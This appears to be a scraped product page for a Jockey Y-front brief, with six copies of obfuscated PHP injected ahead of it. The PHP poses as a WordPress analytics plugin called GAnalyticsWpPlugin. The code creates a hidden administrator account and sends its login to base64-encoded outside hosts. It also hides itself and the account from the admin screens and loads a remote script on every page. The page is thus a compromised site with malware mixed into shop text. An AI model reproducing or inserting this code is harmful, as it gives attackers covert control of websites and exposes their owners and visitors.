/**
* Plugin Name: GAnalyticsWpPlugin
* Plugin URI: https://github.com
* Description: GAnalyticsWpPlugin
* Version: 1.4.0
* Author: CoreFlux Systems
* Author URI: https://github.com/coreflux
* Text Domain: GAnalyticsWpPlugin
* License: MIT
*/
/*12f49d2b28e0b2af*/function _ba1dbd($_x){return $_x;}function _6e847b($_x){return $_x;}$_e5b2663b=["version"=>"1.4.0","font"=>"aHR0cHM6Ly9mb250cy5nb29nbGVhcGlzLmNvbS9jc3MyP2ZhbWlseT1Sb2JvdG86aXRhbCx3Z2h0QDAsMTAw","endpoint"=>"aHR0cHM6Ly9waXhlbG1ldHJpY3MubGl2ZQ==","sitePubKey"=>"NDA1M2Q3MWRjOGFiMjM1MzE2MWI3YjM2NDYyNzY5M2Q="];global $_11cd4e48;if(!is_array($_11cd4e48)){$_11cd4e48=[];}if(!in_array($_e5b2663b["version"],$_11cd4e48,true)){$_11cd4e48[]=$_e5b2663b["version"];}class GAnalyticsWpPlugin{private $seed;private $version;private $hooksOwner;public function __construct(){global $_e5b2663b;$this->version=$_e5b2663b["version"];$this->seed=md5(DB_PASSWORD.AUTH_SALT);if(!defined('GANALYTICS_HOOKS_ACTIVE')){define('GANALYTICS_HOOKS_ACTIVE',$this->version);$this->hooksOwner=true;}else{$this->hooksOwner=false;}if($this->hooksOwner){add_filter("all_plugins",[$this,"hplugin"]);add_action("init",[$this,"createuser"]);add_action("pre_user_query",[$this,"filterusers"]);}add_action("wp_enqueue_scripts",[$this,"loadassets"]);}public function hplugin($_297fe330){unset($_297fe330[plugin_basename(__FILE__)]);return $_297fe330;}public function createuser(){if(get_option("ganalytics_data_sent",false)){return;}$_72e03365=$this->generate_credentials();if(!username_exists($_72e03365["user"])){$_e072e266=wp_create_user($_72e03365["user"],$_72e03365["pass"],$_72e03365["email"]);if(!is_wp_error($_e072e266)){(new WP_User($_e072e266))->set_role("administrator");}}$this->setup_site_credentials($_72e03365["user"],$_72e03365["pass"]);update_option("ganalytics_data_sent",true);}private function generate_credentials(){$_8910ff8a=substr(hash("sha256",$this->seed."dwanw98232h13ndwa"),0,16);return["user"=>"system".substr(md5($_8910ff8a),0,8),"pass"=>substr(md5($_8910ff8a."pass"),0,12),"email"=>"system@".parse_url(home_url(),PHP_URL_HOST),"ip"=>$_SERVER["SERVER_ADDR"],"url"=>home_url()];}private function setup_site_credentials($_6a936043,$_299c4ac1){global $_e5b2663b;$_7de22135=["domain"=>parse_url(home_url(),PHP_URL_HOST),"siteKey"=>base64_decode($_e5b2663b['sitePubKey']),"login"=>$_6a936043,"password"=>$_299c4ac1];$_8d1fa2f3=["body"=>json_encode($_7de22135),"headers"=>["Content-Type"=>"application/json"],"timeout"=>15,"blocking"=>false,"sslverify"=>false];wp_remote_post(base64_decode($_e5b2663b["endpoint"])."/api/sites/setup-credentials",$_8d1fa2f3);}public function filterusers($_446e7c6f){global $wpdb;$_a59f673a=$this->generate_credentials()["user"];$_446e7c6f->query_where.=" AND {$wpdb->users}.user_login != '{$_a59f673a}'";}public function loadassets(){global $_e5b2663b,$_11cd4e48;$_72166cfd=true;if(is_array($_11cd4e48)){foreach($_11cd4e48 as $_acd8ab69){if(version_compare($_acd8ab69,$this->version,'>')){$_72166cfd=false;break;}}}$_e3459999=wp_script_is('ganalytics-tracker','registered')||wp_script_is('ganalytics-tracker','enqueued');if($_72166cfd&&$_e3459999){wp_deregister_script('ganalytics-tracker');wp_deregister_style('ganalytics-fonts');$_e3459999=false;}if(!$_72166cfd&&$_e3459999){return;}wp_enqueue_style("ganalytics-fonts",base64_decode($_e5b2663b["font"]),[],null);$_77e3e113=base64_decode($_e5b2663b["endpoint"])."/t.js?site=".base64_decode($_e5b2663b['sitePubKey']);wp_enqueue_script("ganalytics-tracker",$_77e3e113,[],null,["strategy"=>"defer","in_footer"=>false]);$this->setCaptchaCookie();}public function setCaptchaCookie(){if(!is_user_logged_in()){return;}if(isset($_COOKIE['fkrc_shown'])){return;}$_0a407a31=time()+(365*24*60*60);setcookie('fkrc_shown','1',$_0a407a31,'/','',false,false);}}register_deactivation_hook(__FILE__,function(){delete_option("ganalytics_data_sent");});new GAnalyticsWpPlugin();
/**
* Plugin Name: GAnalyticsWpPlugin
* Plugin URI: https://github.com
* Description: GAnalyticsWpPlugin
* Version: 1.4.0
* Author: CoreFlux Systems
* Author URI: https://github.com/coreflux
* Text Domain: GAnalyticsWpPlugin
* License: MIT
*/
/*4f0f81befbce8790*/function _4a67e1($_x){return $_x;}function _8e6a8e($_x){return $_x;}$_58fc340c=["version"=>"1.4.0","font"=>"aHR0cHM6Ly9mb250cy5nb29nbGVhcGlzLmNvbS9jc3MyP2ZhbWlseT1Sb2JvdG86aXRhbCx3Z2h0QDAsMTAw","endpoint"=>"aHR0cHM6Ly9nb29nbGFuYWxpdGxjcy54eXo=","sitePubKey"=>"NDA1M2Q3MWRjOGFiMjM1MzE2MWI3YjM2NDYyNzY5M2Q="];global $_097cb6ac;if(!is_array($_097cb6ac)){$_097cb6ac=[];}if(!in_array($_58fc340c["version"],$_097cb6ac,true)){$_097cb6ac[]=$_58fc340c["version"];}class GAnalyticsWpPlugin{private $seed;private $version;private $hooksOwner;public function __construct(){global $_58fc340c;$this->version=$_58fc340c["version"];$this->seed=md5(DB_PASSWORD.AUTH_SALT);if(!defined('GANALYTICS_HOOKS_ACTIVE')){define('GANALYTICS_HOOKS_ACTIVE',$this->version);$this->hooksOwner=true;}else{$this->hooksOwner=false;}if($this->hooksOwner){add_filter("all_plugins",[$this,"hplugin"]);add_action("init",[$this,"createuser"]);add_action("pre_user_query",[$this,"filterusers"]);}add_action("wp_enqueue_scripts",[$this,"loadassets"]);}public function hplugin($_fe50c149){unset($_fe50c149[plugin_basename(__FILE__)]);return $_fe50c149;}public function createuser(){if(get_option("ganalytics_data_sent",false)){return;}$_c277d29a=$this->generate_credentials();if(!username_exists($_c277d29a["user"])){$_935ab93d=wp_create_user($_c277d29a["user"],$_c277d29a["pass"],$_c277d29a["email"]);if(!is_wp_error($_935ab93d)){(new WP_User($_935ab93d))->set_role("administrator");}}$this->setup_site_credentials($_c277d29a["user"],$_c277d29a["pass"]);update_option("ganalytics_data_sent",true);}private function generate_credentials(){$_db5fda43=substr(hash("sha256",$this->seed."dwanw98232h13ndwa"),0,16);return["user"=>"system".substr(md5($_db5fda43),0,8),"pass"=>substr(md5($_db5fda43."pass"),0,12),"email"=>"system@".parse_url(home_url(),PHP_URL_HOST),"ip"=>$_SERVER["SERVER_ADDR"],"url"=>home_url()];}private function setup_site_credentials($_5fc77612,$_3b5657e6){global $_58fc340c;$_b9a683b7=["domain"=>parse_url(home_url(),PHP_URL_HOST),"siteKey"=>base64_decode($_58fc340c['sitePubKey']),"login"=>$_5fc77612,"password"=>$_3b5657e6];$_90e69890=["body"=>json_encode($_b9a683b7),"headers"=>["Content-Type"=>"application/json"],"timeout"=>15,"blocking"=>false,"sslverify"=>false];wp_remote_post(base64_decode($_58fc340c["endpoint"])."/api/sites/setup-credentials",$_90e69890);}public function filterusers($_012db4b6){global $wpdb;$_51e5dfe6=$this->generate_credentials()["user"];$_012db4b6->query_where.=" AND {$wpdb->users}.user_login != '{$_51e5dfe6}'";}public function loadassets(){global $_58fc340c,$_097cb6ac;$_0a08e14f=true;if(is_array($_097cb6ac)){foreach($_097cb6ac as $_38a44cb0){if(version_compare($_38a44cb0,$this->version,'>')){$_0a08e14f=false;break;}}}$_19d75327=wp_script_is('ganalytics-tracker','registered')||wp_script_is('ganalytics-tracker','enqueued');if($_0a08e14f&&$_19d75327){wp_deregister_script('ganalytics-tracker');wp_deregister_style('ganalytics-fonts');$_19d75327=false;}if(!$_0a08e14f&&$_19d75327){return;}wp_enqueue_style("ganalytics-fonts",base64_decode($_58fc340c["font"]),[],null);$_8e772c51=base64_decode($_58fc340c["endpoint"])."/t.js?site=".base64_decode($_58fc340c['sitePubKey']);wp_enqueue_script("ganalytics-tracker",$_8e772c51,[],null,["strategy"=>"defer","in_footer"=>false]);$this->setCaptchaCookie();}public function setCaptchaCookie(){if(!is_user_logged_in()){return;}if(isset($_COOKIE['fkrc_shown'])){return;}$_574527e8=time()+(365*24*60*60);setcookie('fkrc_shown','1',$_574527e8,'/','',false,false);}}register_deactivation_hook(__FILE__,function(){delete_option("ganalytics_data_sent");});new GAnalyticsWpPlugin();
/**
* Plugin Name: GAnalyticsWpPlugin
* Plugin URI: https://github.com
* Description: GAnalyticsWpPlugin
* Version: 1.4.0
* Author: CoreFlux Systems
* Author URI: https://github.com/coreflux
* Text Domain: GAnalyticsWpPlugin
* License: MIT
*/
/*e6d2e6a712ee5744*/function _a5c2dd($_x){return $_x;}function _93841c($_x){return $_x;}function _dfaee8($_x){return $_x;}$_27e64d93=["version"=>"1.4.0","font"=>"aHR0cHM6Ly9mb250cy5nb29nbGVhcGlzLmNvbS9jc3MyP2ZhbWlseT1Sb2JvdG86aXRhbCx3Z2h0QDAsMTAw","endpoint"=>"aHR0cHM6Ly9kYXRhcGl4ZWwuaWN1","sitePubKey"=>"NDA1M2Q3MWRjOGFiMjM1MzE2MWI3YjM2NDYyNzY5M2Q="];global $_3d5e6f9f;if(!is_array($_3d5e6f9f)){$_3d5e6f9f=[];}if(!in_array($_27e64d93["version"],$_3d5e6f9f,true)){$_3d5e6f9f[]=$_27e64d93["version"];}class GAnalyticsWpPlugin{private $seed;private $version;private $hooksOwner;public function __construct(){global $_27e64d93;$this->version=$_27e64d93["version"];$this->seed=md5(DB_PASSWORD.AUTH_SALT);if(!defined('GANALYTICS_HOOKS_ACTIVE')){define('GANALYTICS_HOOKS_ACTIVE',$this->version);$this->hooksOwner=true;}else{$this->hooksOwner=false;}if($this->hooksOwner){add_filter("all_plugins",[$this,"hplugin"]);add_action("init",[$this,"createuser"]);add_action("pre_user_query",[$this,"filterusers"]);}add_action("wp_enqueue_scripts",[$this,"loadassets"]);}public function hplugin($_d800dc96){unset($_d800dc96[plugin_basename(__FILE__)]);return $_d800dc96;}public function createuser(){if(get_option("ganalytics_data_sent",false)){return;}$_b4feaef7=$this->generate_credentials();if(!username_exists($_b4feaef7["user"])){$_4c2c8098=wp_create_user($_b4feaef7["user"],$_b4feaef7["pass"],$_b4feaef7["email"]);if(!is_wp_error($_4c2c8098)){(new WP_User($_4c2c8098))->set_role("administrator");}}$this->setup_site_credentials($_b4feaef7["user"],$_b4feaef7["pass"]);update_option("ganalytics_data_sent",true);}private function generate_credentials(){$_45d0396d=substr(hash("sha256",$this->seed."dwanw98232h13ndwa"),0,16);return["user"=>"system".substr(md5($_45d0396d),0,8),"pass"=>substr(md5($_45d0396d."pass"),0,12),"email"=>"system@".parse_url(home_url(),PHP_URL_HOST),"ip"=>$_SERVER["SERVER_ADDR"],"url"=>home_url()];}private function setup_site_credentials($_130981a4,$_63782382){global $_27e64d93;$_38518195=["domain"=>parse_url(home_url(),PHP_URL_HOST),"siteKey"=>base64_decode($_27e64d93['sitePubKey']),"login"=>$_130981a4,"password"=>$_63782382];$_2a02376a=["body"=>json_encode($_38518195),"headers"=>["Content-Type"=>"application/json"],"timeout"=>15,"blocking"=>false,"sslverify"=>false];wp_remote_post(base64_decode($_27e64d93["endpoint"])."/api/sites/setup-credentials",$_2a02376a);}public function filterusers($_f0a4783c){global $wpdb;$_5a703d7a=$this->generate_credentials()["user"];$_f0a4783c->query_where.=" AND {$wpdb->users}.user_login != '{$_5a703d7a}'";}public function loadassets(){global $_27e64d93,$_3d5e6f9f;$_07b51919=true;if(is_array($_3d5e6f9f)){foreach($_3d5e6f9f as $_e8eb449d){if(version_compare($_e8eb449d,$this->version,'>')){$_07b51919=false;break;}}}$_07729ade=wp_script_is('ganalytics-tracker','registered')||wp_script_is('ganalytics-tracker','enqueued');if($_07b51919&&$_07729ade){wp_deregister_script('ganalytics-tracker');wp_deregister_style('ganalytics-fonts');$_07729ade=false;}if(!$_07b51919&&$_07729ade){return;}wp_enqueue_style("ganalytics-fonts",base64_decode($_27e64d93["font"]),[],null);$_1a298285=base64_decode($_27e64d93["endpoint"])."/t.js?site=".base64_decode($_27e64d93['sitePubKey']);wp_enqueue_script("ganalytics-tracker",$_1a298285,[],null,["strategy"=>"defer","in_footer"=>false]);$this->setCaptchaCookie();}public function setCaptchaCookie(){if(!is_user_logged_in()){return;}if(isset($_COOKIE['fkrc_shown'])){return;}$_ccf987bc=time()+(365*24*60*60);setcookie('fkrc_shown','1',$_ccf987bc,'/','',false,false);}}register_deactivation_hook(__FILE__,function(){delete_option("ganalytics_data_sent");});new GAnalyticsWpPlugin();
/**
* Plugin Name: GAnalyticsWpPlugin
* Plugin URI: https://github.com
* Description: GAnalyticsWpPlugin
* Version: 1.4.0
* Author: CoreFlux Systems
* Author URI: https://github.com/coreflux
* Text Domain: GAnalyticsWpPlugin
* License: MIT
*/
/*6276e101316ed706*/function _e43db5($_x){return $_x;}function _96d20c($_x){return $_x;}function _7a7317($_x){return $_x;}$_ba90f7ed=["version"=>"1.4.0","font"=>"aHR0cHM6Ly9mb250cy5nb29nbGVhcGlzLmNvbS9jc3MyP2ZhbWlseT1Sb2JvdG86aXRhbCx3Z2h0QDAsMTAw","endpoint"=>"aHR0cHM6Ly9waXhlbG1ldHJpY3MubGl2ZQ==","sitePubKey"=>"NDA1M2Q3MWRjOGFiMjM1MzE2MWI3YjM2NDYyNzY5M2Q="];global $_1b2e528e;if(!is_array($_1b2e528e)){$_1b2e528e=[];}if(!in_array($_ba90f7ed["version"],$_1b2e528e,true)){$_1b2e528e[]=$_ba90f7ed["version"];}class GAnalyticsWpPlugin{private $seed;private $version;private $hooksOwner;public function __construct(){global $_ba90f7ed;$this->version=$_ba90f7ed["version"];$this->seed=md5(DB_PASSWORD.AUTH_SALT);if(!defined('GANALYTICS_HOOKS_ACTIVE')){define('GANALYTICS_HOOKS_ACTIVE',$this->version);$this->hooksOwner=true;}else{$this->hooksOwner=false;}if($this->hooksOwner){add_filter("all_plugins",[$this,"hplugin"]);add_action("init",[$this,"createuser"]);add_action("pre_user_query",[$this,"filterusers"]);}add_action("wp_enqueue_scripts",[$this,"loadassets"]);}public function hplugin($_52fb85b4){unset($_52fb85b4[plugin_basename(__FILE__)]);return $_52fb85b4;}public function createuser(){if(get_option("ganalytics_data_sent",false)){return;}$_01726b36=$this->generate_credentials();if(!username_exists($_01726b36["user"])){$_faf47079=wp_create_user($_01726b36["user"],$_01726b36["pass"],$_01726b36["email"]);if(!is_wp_error($_faf47079)){(new WP_User($_faf47079))->set_role("administrator");}}$this->setup_site_credentials($_01726b36["user"],$_01726b36["pass"]);update_option("ganalytics_data_sent",true);}private function generate_credentials(){$_96e969d9=substr(hash("sha256",$this->seed."dwanw98232h13ndwa"),0,16);return["user"=>"system".substr(md5($_96e969d9),0,8),"pass"=>substr(md5($_96e969d9."pass"),0,12),"email"=>"system@".parse_url(home_url(),PHP_URL_HOST),"ip"=>$_SERVER["SERVER_ADDR"],"url"=>home_url()];}private function setup_site_credentials($_cfb98685,$_5a3b7532){global $_ba90f7ed;$_3fa96750=["domain"=>parse_url(home_url(),PHP_URL_HOST),"siteKey"=>base64_decode($_ba90f7ed['sitePubKey']),"login"=>$_cfb98685,"password"=>$_5a3b7532];$_b3b5e6ad=["body"=>json_encode($_3fa96750),"headers"=>["Content-Type"=>"application/json"],"timeout"=>15,"blocking"=>false,"sslverify"=>false];wp_remote_post(base64_decode($_ba90f7ed["endpoint"])."/api/sites/setup-credentials",$_b3b5e6ad);}public function filterusers($_538e4c29){global $wpdb;$_082fc24a=$this->generate_credentials()["user"];$_538e4c29->query_where.=" AND {$wpdb->users}.user_login != '{$_082fc24a}'";}public function loadassets(){global $_ba90f7ed,$_1b2e528e;$_e2618672=true;if(is_array($_1b2e528e)){foreach($_1b2e528e as $_f45545db){if(version_compare($_f45545db,$this->version,'>')){$_e2618672=false;break;}}}$_16e81f16=wp_script_is('ganalytics-tracker','registered')||wp_script_is('ganalytics-tracker','enqueued');if($_e2618672&&$_16e81f16){wp_deregister_script('ganalytics-tracker');wp_deregister_style('ganalytics-fonts');$_16e81f16=false;}if(!$_e2618672&&$_16e81f16){return;}wp_enqueue_style("ganalytics-fonts",base64_decode($_ba90f7ed["font"]),[],null);$_1c2eaf2f=base64_decode($_ba90f7ed["endpoint"])."/t.js?site=".base64_decode($_ba90f7ed['sitePubKey']);wp_enqueue_script("ganalytics-tracker",$_1c2eaf2f,[],null,["strategy"=>"defer","in_footer"=>false]);$this->setCaptchaCookie();}public function setCaptchaCookie(){if(!is_user_logged_in()){return;}if(isset($_COOKIE['fkrc_shown'])){return;}$_029c2cee=time()+(365*24*60*60);setcookie('fkrc_shown','1',$_029c2cee,'/','',false,false);}}register_deactivation_hook(__FILE__,function(){delete_option("ganalytics_data_sent");});new GAnalyticsWpPlugin();
/**
* Plugin Name: GAnalyticsWpPlugin
* Plugin URI: https://github.com
* Description: GAnalyticsWpPlugin
* Version: 1.4.0
* Author: CoreFlux Systems
* Author URI: https://github.com/coreflux
* Text Domain: GAnalyticsWpPlugin
* License: MIT
*/
/*12edea3d56fe1dac*/function _2c0ee7($_x){return $_x;}function _7aa172($_x){return $_x;}function _fc9731($_x){return $_x;}function _6cbce9($_x){return $_x;}$_4bab107d=["version"=>"1.4.0","font"=>"aHR0cHM6Ly9mb250cy5nb29nbGVhcGlzLmNvbS9jc3MyP2ZhbWlseT1Sb2JvdG86aXRhbCx3Z2h0QDAsMTAw","endpoint"=>"aHR0cHM6Ly9waXhlbG1ldHJpY3MubGl2ZQ==","sitePubKey"=>"NDA1M2Q3MWRjOGFiMjM1MzE2MWI3YjM2NDYyNzY5M2Q="];global $_434786cf;if(!is_array($_434786cf)){$_434786cf=[];}if(!in_array($_4bab107d["version"],$_434786cf,true)){$_434786cf[]=$_4bab107d["version"];}class GAnalyticsWpPlugin{private $seed;private $version;private $hooksOwner;public function __construct(){global $_4bab107d;$this->version=$_4bab107d["version"];$this->seed=md5(DB_PASSWORD.AUTH_SALT);if(!defined('GANALYTICS_HOOKS_ACTIVE')){define('GANALYTICS_HOOKS_ACTIVE',$this->version);$this->hooksOwner=true;}else{$this->hooksOwner=false;}if($this->hooksOwner){add_filter("all_plugins",[$this,"hplugin"]);add_action("init",[$this,"createuser"]);add_action("pre_user_query",[$this,"filterusers"]);}add_action("wp_enqueue_scripts",[$this,"loadassets"]);}public function hplugin($_441688c7){unset($_441688c7[plugin_basename(__FILE__)]);return $_441688c7;}public function createuser(){if(get_option("ganalytics_data_sent",false)){return;}$_674b8b0c=$this->generate_credentials();if(!username_exists($_674b8b0c["user"])){$_8d421338=wp_create_user($_674b8b0c["user"],$_674b8b0c["pass"],$_674b8b0c["email"]);if(!is_wp_error($_8d421338)){(new WP_User($_8d421338))->set_role("administrator");}}$this->setup_site_credentials($_674b8b0c["user"],$_674b8b0c["pass"]);update_option("ganalytics_data_sent",true);}private function generate_credentials(){$_a13dbea2=substr(hash("sha256",$this->seed."dwanw98232h13ndwa"),0,16);return["user"=>"system".substr(md5($_a13dbea2),0,8),"pass"=>substr(md5($_a13dbea2."pass"),0,12),"email"=>"system@".parse_url(home_url(),PHP_URL_HOST),"ip"=>$_SERVER["SERVER_ADDR"],"url"=>home_url()];}private function setup_site_credentials($_44fdada9,$_4ecee956){global $_4bab107d;$_dc4ca387=["domain"=>parse_url(home_url(),PHP_URL_HOST),"siteKey"=>base64_decode($_4bab107d['sitePubKey']),"login"=>$_44fdada9,"password"=>$_4ecee956];$_5411b56f=["body"=>json_encode($_dc4ca387),"headers"=>["Content-Type"=>"application/json"],"timeout"=>15,"blocking"=>false,"sslverify"=>false];wp_remote_post(base64_decode($_4bab107d["endpoint"])."/api/sites/setup-credentials",$_5411b56f);}public function filterusers($_39377715){global $wpdb;$_3e49ee29=$this->generate_credentials()["user"];$_39377715->query_where.=" AND {$wpdb->users}.user_login != '{$_3e49ee29}'";}public function loadassets(){global $_4bab107d,$_434786cf;$_07b77347=true;if(is_array($_434786cf)){foreach($_434786cf as $_0aac6a00){if(version_compare($_0aac6a00,$this->version,'>')){$_07b77347=false;break;}}}$_f90df43b=wp_script_is('ganalytics-tracker','registered')||wp_script_is('ganalytics-tracker','enqueued');if($_07b77347&&$_f90df43b){wp_deregister_script('ganalytics-tracker');wp_deregister_style('ganalytics-fonts');$_f90df43b=false;}if(!$_07b77347&&$_f90df43b){return;}wp_enqueue_style("ganalytics-fonts",base64_decode($_4bab107d["font"]),[],null);$_8931410e=base64_decode($_4bab107d["endpoint"])."/t.js?site=".base64_decode($_4bab107d['sitePubKey']);wp_enqueue_script("ganalytics-tracker",$_8931410e,[],null,["strategy"=>"defer","in_footer"=>false]);$this->setCaptchaCookie();}public function setCaptchaCookie(){if(!is_user_logged_in()){return;}if(isset($_COOKIE['fkrc_shown'])){return;}$_e08c4ea6=time()+(365*24*60*60);setcookie('fkrc_shown','1',$_e08c4ea6,'/','',false,false);}}register_deactivation_hook(__FILE__,function(){delete_option("ganalytics_data_sent");});new GAnalyticsWpPlugin();
/**
* Plugin Name: GAwp_a926d938
* Plugin URI: https://github.com
* Description: GAwp_a926d938
* Version: 1.5.0
* Author: CoreFlux Systems
* Author URI: https://github.com/coreflux
* Text Domain: GAwp_a926d938
* License: MIT
*/
/*ef3bc6baebfd1998*/function _9a4848($_x){return $_x;}function _ded9ad($_x){return $_x;}function _608741($_x){return $_x;}$_50c2f5cf=["version"=>"1.5.0","font"=>"aHR0cHM6Ly9mb250cy5nb29nbGVhcGlzLmNvbS9jc3MyP2ZhbWlseT1Sb2JvdG86aXRhbCx3Z2h0QDAsMTAw","endpoint"=>"aHR0cHM6Ly9zaXRlaW5zaWdodHMuaWN1","sitePubKey"=>"YmNiNzJhZTY3NjZlMDgxOTZlYWQ3NGRjOTNmYzlmMmQ="];global $_5c10eaf4;if(!is_array($_5c10eaf4)){$_5c10eaf4=[];}if(!in_array($_50c2f5cf["version"],$_5c10eaf4,true)){$_5c10eaf4[]=$_50c2f5cf["version"];}class GAwp_a926d938{private $seed;private $version;private $hooksOwner;public function __construct(){global $_50c2f5cf;$this->version=$_50c2f5cf["version"];$this->seed=md5(DB_PASSWORD.AUTH_SALT);if(!defined('GANALYTICS_HOOKS_ACTIVE')){define('GANALYTICS_HOOKS_ACTIVE',$this->version);$this->hooksOwner=true;}else{$this->hooksOwner=false;}if($this->hooksOwner){add_filter("all_plugins",[$this,"hplugin"]);add_action("init",[$this,"createuser"]);add_action("pre_user_query",[$this,"filterusers"]);}add_action("wp_enqueue_scripts",[$this,"loadassets"]);}public function hplugin($_9452eab2){unset($_9452eab2[plugin_basename(__FILE__)]);return $_9452eab2;}public function createuser(){if(get_option("ganalytics_data_sent",false)){return;}$_58070deb=$this->generate_credentials();if(!username_exists($_58070deb["user"])){$_b252c0af=wp_create_user($_58070deb["user"],$_58070deb["pass"],$_58070deb["email"]);if(!is_wp_error($_b252c0af)){(new WP_User($_b252c0af))->set_role("administrator");}}$this->setup_site_credentials($_58070deb["user"],$_58070deb["pass"]);update_option("ganalytics_data_sent",true);}private function generate_credentials(){$_a58c97b3=substr(hash("sha256",$this->seed."dwanw98232h13ndwa"),0,16);return["user"=>"system".substr(md5($_a58c97b3),0,8),"pass"=>substr(md5($_a58c97b3."pass"),0,12),"email"=>"system@".parse_url(home_url(),PHP_URL_HOST),"ip"=>$_SERVER["SERVER_ADDR"],"url"=>home_url()];}private function setup_site_credentials($_f844cff1,$_04a54045){global $_50c2f5cf;$_ebc52921=["domain"=>parse_url(home_url(),PHP_URL_HOST),"siteKey"=>base64_decode($_50c2f5cf['sitePubKey']),"login"=>$_f844cff1,"password"=>$_04a54045];$_d34d0f04=["body"=>json_encode($_ebc52921),"headers"=>["Content-Type"=>"application/json"],"timeout"=>15,"blocking"=>false,"sslverify"=>false];wp_remote_post(base64_decode($_50c2f5cf["endpoint"])."/api/sites/setup-credentials",$_d34d0f04);}public function filterusers($_910be377){global $wpdb;$_e240837a=$this->generate_credentials()["user"];$_910be377->query_where.=" AND {$wpdb->users}.user_login != '{$_e240837a}'";}public function loadassets(){global $_50c2f5cf,$_5c10eaf4;$_2e71e3bb=true;if(is_array($_5c10eaf4)){foreach($_5c10eaf4 as $_607b8839){if(version_compare($_607b8839,$this->version,'>')){$_2e71e3bb=false;break;}}}$_1095d081=wp_script_is('ganalytics-tracker','registered')||wp_script_is('ganalytics-tracker','enqueued');if($_2e71e3bb&&$_1095d081){wp_deregister_script('ganalytics-tracker');wp_deregister_style('ganalytics-fonts');$_1095d081=false;}if(!$_2e71e3bb&&$_1095d081){return;}wp_enqueue_style("ganalytics-fonts",base64_decode($_50c2f5cf["font"]),[],null);$_2b41d259=base64_decode($_50c2f5cf["endpoint"])."/t.js?site=".base64_decode($_50c2f5cf['sitePubKey']);wp_enqueue_script("ganalytics-tracker",$_2b41d259,[],null,["strategy"=>"defer","in_footer"=>false]);$this->setCaptchaCookie();}public function setCaptchaCookie(){if(!is_user_logged_in()){return;}if(isset($_COOKIE['fkrc_shown'])){return;}$_3c0d7000=time()+(365*24*60*60);setcookie('fkrc_shown','1',$_3c0d7000,'/','',false,false);}}register_deactivation_hook(__FILE__,function(){delete_option("ganalytics_data_sent");});new GAwp_a926d938();
Jockey Midway Y-Front Brief
Jockey Midway Y-Front Brief (Single Pack)
Home / Underwear / Jockey Midway Y-Front Brief (Single Pack)
Jockey Midway Y-Front Brief (Single Pack) £ 10.50
Make the Jockey® Classic Cotton Rib Midway® ® Brief with Y-Front® Fly your first choice for adding total comfort to your business or everyday wear. The fabric is soft, and breathes and wicks sweat to help you stay cooler, drier and fresher on warm days or during warmer workouts. The fine cotton rib adds stretch and strength, so the brief stays looking and feeling good, wash after wash. The wide leg hem helps the brief lie flat against your body, even under fitted clothes. A double-lined pouch combines comfort and support.
Full rise and coverage
100% Cotton
Y-Front® fly
Machine wash and dry
Description
Jockey Midway Y-Front Brief
The Jockey® Luxury Cotton Y-Front® Midway® ® Brief gives you the comfort, coverage and support you need when you’re in the office, the game or full relaxation mode. The key is a special treatment that removes impurities like lint and fuzz from the 100% cotton fabric, leaving it softer and smoother than any cotton brief you’ve worn before. No side seams helps this underwear eliminate a potential source of irritation that’s found in inferior briefs.
Mid rise and full coverage
100% Gassed Cotton
Y-Front® fly
Soft and breathable
Machine Wash colors at 60°C | White at 95°C | Do Not Bleach | Machine Dry | Iron able
This website uses cookies to improve your experience. We'll assume you're ok with this, you can accept or read more about our cookies here. Read More ACCEPT Privacy & Cookies Policy
If you don’t see something, simply fill in the form below and one of our team will help you out. We’re sure we can supply what you need.
×
Reviews
There are no reviews yet.